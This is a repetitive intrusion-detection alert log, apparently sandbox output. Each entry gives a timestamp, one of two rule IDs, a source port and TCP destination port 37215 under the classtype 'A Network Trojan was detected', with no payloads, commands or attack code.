            Timestamp:05/28/24-09:57:21.869138
            SID:2829579
            Source Port:60692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062510
            SID:2829579
            Source Port:52432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320321
            SID:2835222
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852153
            SID:2829579
            Source Port:44924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853911
            SID:2829579
            Source Port:45174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822097
            SID:2829579
            Source Port:42238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930443
            SID:2829579
            Source Port:44822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778296
            SID:2835222
            Source Port:42904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771562
            SID:2835222
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742383
            SID:2835222
            Source Port:44416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866984
            SID:2835222
            Source Port:44474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745531
            SID:2835222
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261844
            SID:2835222
            Source Port:46308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777073
            SID:2829579
            Source Port:40188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778716
            SID:2829579
            Source Port:35038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804406
            SID:2835222
            Source Port:41356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046109
            SID:2835222
            Source Port:34962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507970
            SID:2835222
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282877
            SID:2835222
            Source Port:34426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507736
            SID:2835222
            Source Port:42418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356956
            SID:2829579
            Source Port:57756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926874
            SID:2835222
            Source Port:47536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251794
            SID:2829579
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739072
            SID:2829579
            Source Port:39868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956287
            SID:2829579
            Source Port:32840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273339
            SID:2835222
            Source Port:42640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818858
            SID:2835222
            Source Port:51580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962914
            SID:2835222
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321309
            SID:2835222
            Source Port:44718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027738
            SID:2835222
            Source Port:53952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299741
            SID:2835222
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732745
            SID:2829579
            Source Port:56374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.805229
            SID:2829579
            Source Port:55180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892325
            SID:2829579
            Source Port:56000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617854
            SID:2835222
            Source Port:53644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047814
            SID:2829579
            Source Port:43060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955347
            SID:2829579
            Source Port:49740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476040
            SID:2835222
            Source Port:60112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842796
            SID:2829579
            Source Port:37890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846789
            SID:2835222
            Source Port:51848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873287
            SID:2835222
            Source Port:60526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808283
            SID:2829579
            Source Port:49746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848339
            SID:2835222
            Source Port:52100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581871
            SID:2829579
            Source Port:59136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.915901
            SID:2835222
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563369
            SID:2829579
            Source Port:39458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900634
            SID:2835222
            Source Port:49816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917767
            SID:2835222
            Source Port:42454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935181
            SID:2829579
            Source Port:49592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615285
            SID:2829579
            Source Port:57852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070306
            SID:2835222
            Source Port:41786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309324
            SID:2835222
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026369
            SID:2829579
            Source Port:58200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953634
            SID:2829579
            Source Port:33680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737282
            SID:2829579
            Source Port:55074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.322190
            SID:2829579
            Source Port:55380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884874
            SID:2829579
            Source Port:42508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.030966
            SID:2829579
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308092
            SID:2835222
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374196
            SID:2835222
            Source Port:39282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348634
            SID:2835222
            Source Port:40208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379697
            SID:2835222
            Source Port:39976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788802
            SID:2829579
            Source Port:34274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321549
            SID:2835222
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290440
            SID:2829579
            Source Port:33470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057825
            SID:2835222
            Source Port:42776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899412
            SID:2829579
            Source Port:41246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.548602
            SID:2829579
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318228
            SID:2835222
            Source Port:56122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977636
            SID:2829579
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596840
            SID:2835222
            Source Port:44536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.749868
            SID:2829579
            Source Port:60046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582314
            SID:2835222
            Source Port:53160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565875
            SID:2835222
            Source Port:39036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751203
            SID:2835222
            Source Port:44316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990115
            SID:2835222
            Source Port:42048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039344
            SID:2835222
            Source Port:42770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909978
            SID:2829579
            Source Port:38172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809435
            SID:2835222
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895525
            SID:2829579
            Source Port:50532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.460115
            SID:2835222
            Source Port:51474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260496
            SID:2835222
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869801
            SID:2835222
            Source Port:56176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863506
            SID:2835222
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962891
            SID:2829579
            Source Port:49118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866497
            SID:2829579
            Source Port:59106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556495
            SID:2835222
            Source Port:37822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824989
            SID:2829579
            Source Port:41868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047969
            SID:2829579
            Source Port:59174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993920
            SID:2835222
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561783
            SID:2835222
            Source Port:40654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870116
            SID:2829579
            Source Port:47064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900577
            SID:2829579
            Source Port:44202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068391
            SID:2835222
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543826
            SID:2829579
            Source Port:39020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847826
            SID:2829579
            Source Port:57086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809804
            SID:2835222
            Source Port:52422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473237
            SID:2829579
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938937
            SID:2835222
            Source Port:49504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926228
            SID:2835222
            Source Port:41000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989292
            SID:2835222
            Source Port:43982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442263
            SID:2835222
            Source Port:56644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070898
            SID:2835222
            Source Port:58420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060212
            SID:2835222
            Source Port:42610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069098
            SID:2829579
            Source Port:37820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.598006
            SID:2835222
            Source Port:53710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922361
            SID:2829579
            Source Port:38440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962868
            SID:2835222
            Source Port:58338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899802
            SID:2835222
            Source Port:50340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872314
            SID:2829579
            Source Port:47620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772478
            SID:2829579
            Source Port:48524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856488
            SID:2835222
            Source Port:39642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962797
            SID:2829579
            Source Port:45556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811155
            SID:2829579
            Source Port:37910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038180
            SID:2835222
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895636
            SID:2835222
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623327
            SID:2835222
            Source Port:54244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334322
            SID:2835222
            Source Port:47100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941765
            SID:2829579
            Source Port:35364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879442
            SID:2829579
            Source Port:43808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869193
            SID:2829579
            Source Port:37720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.451534
            SID:2835222
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930819
            SID:2835222
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643838
            SID:2835222
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812637
            SID:2835222
            Source Port:60474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928210
            SID:2829579
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026301
            SID:2829579
            Source Port:51736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.904825
            SID:2829579
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611310
            SID:2829579
            Source Port:40384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850983
            SID:2829579
            Source Port:53090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741158
            SID:2829579
            Source Port:56704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433100
            SID:2829579
            Source Port:35322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994815
            SID:2829579
            Source Port:40168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031016
            SID:2829579
            Source Port:32934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010551
            SID:2835222
            Source Port:53106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751652
            SID:2829579
            Source Port:53046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471249
            SID:2835222
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909194
            SID:2829579
            Source Port:44096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872721
            SID:2829579
            Source Port:57660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777018
            SID:2835222
            Source Port:48040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764727
            SID:2829579
            Source Port:39794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868051
            SID:2835222
            Source Port:47630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772509
            SID:2829579
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922603
            SID:2829579
            Source Port:46850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870217
            SID:2829579
            Source Port:47950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230983
            SID:2829579
            Source Port:34988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573622
            SID:2835222
            Source Port:48176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918270
            SID:2829579
            Source Port:47852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037847
            SID:2829579
            Source Port:48878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601750
            SID:2835222
            Source Port:59946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779688
            SID:2835222
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808360
            SID:2835222
            Source Port:44828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.437057
            SID:2835222
            Source Port:58594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626271
            SID:2835222
            Source Port:43984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.723362
            SID:2835222
            Source Port:55726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065818
            SID:2835222
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446497
            SID:2829579
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026858
            SID:2835222
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.657169
            SID:2829579
            Source Port:55552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934189
            SID:2835222
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870098
            SID:2829579
            Source Port:56848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469668
            SID:2829579
            Source Port:37326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671422
            SID:2829579
            Source Port:45676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852635
            SID:2829579
            Source Port:58564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805659
            SID:2829579
            Source Port:40314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396442
            SID:2829579
            Source Port:36856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840332
            SID:2829579
            Source Port:39730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899852
            SID:2835222
            Source Port:45656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869282
            SID:2835222
            Source Port:44754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893332
            SID:2835222
            Source Port:52710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994292
            SID:2829579
            Source Port:49634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905994
            SID:2829579
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084569
            SID:2829579
            Source Port:50546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876367
            SID:2835222
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413025
            SID:2829579
            Source Port:48446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187373
            SID:2829579
            Source Port:50284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775945
            SID:2829579
            Source Port:60352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506701
            SID:2829579
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767523
            SID:2835222
            Source Port:37464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809146
            SID:2829579
            Source Port:42726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994275
            SID:2835222
            Source Port:58870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507273
            SID:2835222
            Source Port:40600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804326
            SID:2835222
            Source Port:37786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073085
            SID:2829579
            Source Port:46022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793702
            SID:2835222
            Source Port:52438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909104
            SID:2835222
            Source Port:59564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839636
            SID:2835222
            Source Port:41496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298716
            SID:2835222
            Source Port:59748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956322
            SID:2835222
            Source Port:38100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059796
            SID:2835222
            Source Port:46246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553165
            SID:2829579
            Source Port:32848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778442
            SID:2835222
            Source Port:52680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879684
            SID:2829579
            Source Port:53318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622524
            SID:2835222
            Source Port:56322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559180
            SID:2835222
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646515
            SID:2829579
            Source Port:45126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776391
            SID:2829579
            Source Port:33262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857152
